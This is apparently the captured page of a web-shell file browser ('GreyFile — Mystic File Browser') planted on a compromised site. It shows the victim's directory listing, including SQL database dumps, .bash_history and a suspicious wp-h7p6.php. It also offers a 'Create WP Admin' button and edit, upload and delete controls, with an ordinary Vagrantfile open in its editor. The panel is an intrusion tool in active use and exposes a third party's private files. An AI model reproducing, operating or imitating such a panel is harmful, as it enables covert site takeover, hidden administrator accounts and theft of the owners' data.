?? GreyFile — Mystic File Browser
Current path:
home
/
webdevt
/
cryptoimpot.fr
/
?? Create WP Admin
??
Go up: /home/webdevt
?? Editing: Vagrantfile
# -*- mode: ruby -*- # vi: set ft=ruby : VAGRANTFILE_API_VERSION = '2' @script = <<SCRIPT # Install dependencies apt-get update apt-get install -y apache2 git curl php7.0 php7.0-bcmath php7.0-bz2 php7.0-cli php7.0-curl php7.0-intl php7.0-json php7.0-mbstring php7.0-opcache php7.0-soap php7.0-sqlite3 php7.0-xml php7.0-xsl php7.0-zip libapache2-mod-php7.0 # Configure Apache echo '<VirtualHost *:80> DocumentRoot /var/www/public AllowEncodedSlashes On <Directory /var/www/public> Options +Indexes +FollowSymLinks DirectoryIndex index.php index.html Order allow,deny Allow from all AllowOverride All </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost>' > /etc/apache2/sites-available/000-default.conf a2enmod rewrite service apache2 restart if [ -e /usr/local/bin/composer ]; then /usr/local/bin/composer self-update else curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer fi # Reset home directory of vagrant user if ! grep -q "cd /var/www" /home/vagrant/.profile; then echo "cd /var/www" >> /home/vagrant/.profile fi echo "** [ZF] Run the following command to install dependencies, if you have not already:" echo " vagrant ssh -c 'composer install'" echo "** [ZF] Visit http://localhost:8080 in your browser for to view the application **" SCRIPT Vagrant.configure(VAGRANTFILE_API_VERSION) do |config| config.vm.box = 'bento/ubuntu-16.04' config.vm.network "forwarded_port", guest: 80, host: 8080 config.vm.synced_folder '.', '/var/www' config.vm.provision 'shell', inline: @script config.vm.provider "virtualbox" do |vb| vb.customize ["modifyvm", :id, "--memory", "1024"] vb.customize ["modifyvm", :id, "--name", "ZF Application - Ubuntu 16.04"] end end
Save
Upload
??
Create Folder
??
Create File
??
.git
|
??? Delete
??
.idea
|
??? Delete
??
build
|
??? Delete
??
config
|
??? Delete
??
contracts
|
??? Delete
??
crypto-cours
|
??? Delete
??
data
|
??? Delete
??
migrations
|
??? Delete
??
module
|
??? Delete
??
nbproject
|
??? Delete
??
public
|
??? Delete
??
sql_save
|
??? Delete
??
test
|
??? Delete
??
tools
|
??? Delete
??
.bash_history
|
?? Edit
|
??? Delete
??
.DS_Store
|
?? Edit
|
??? Delete
??
.gitignore
|
?? Edit
|
??? Delete
??
composer-oldtoday.lock
|
?? Edit
|
??? Delete
??
composer.json
|
?? Edit
|
??? Delete
??
composer.json.old-today
|
?? Edit
|
??? Delete
??
composer.lock
|
?? Edit
|
??? Delete
??
composer_1.lock
|
?? Edit
|
??? Delete
??
composer_1_1.json
|
?? Edit
|
??? Delete
??
composer_save-05-2020.json
|
?? Edit
|
??? Delete
??
composer_save05-2020.lock
|
?? Edit
|
??? Delete
??
CONDUCT.md
|
?? Edit
|
??? Delete
??
CONTRIBUTING.md
|
?? Edit
|
??? Delete
??
db-12-05-2021.sql
|
?? Edit
|
??? Delete
??
docker-compose.yml
|
?? Edit
|
??? Delete
??
Dockerfile
|
?? Edit
|
??? Delete
??
excchanges.psd
|
?? Edit
|
??? Delete
??
ledgio-save-27-05.sql
|
?? Edit
|
??? Delete
??
ledgio-save04-2021.sql
|
?? Edit
|
??? Delete
??
ledgio_bdd_19_05_2021.sql
|
?? Edit
|
??? Delete
??
LICENSE.md
|
?? Edit
|
??? Delete
??
phpcs.xml
|
?? Edit
|
??? Delete
??
phpunit.xml.dist
|
?? Edit
|
??? Delete
??
README.md
|
?? Edit
|
??? Delete
??
testasuppreimer
|
?? Edit
|
??? Delete
??
TODO.md
|
?? Edit
|
??? Delete
??
truffle-config.js
|
?? Edit
|
??? Delete
??
Vagrantfile
|
?? Edit
|
??? Delete
??
wp-h7p6.php
|
?? Edit
|
??? Delete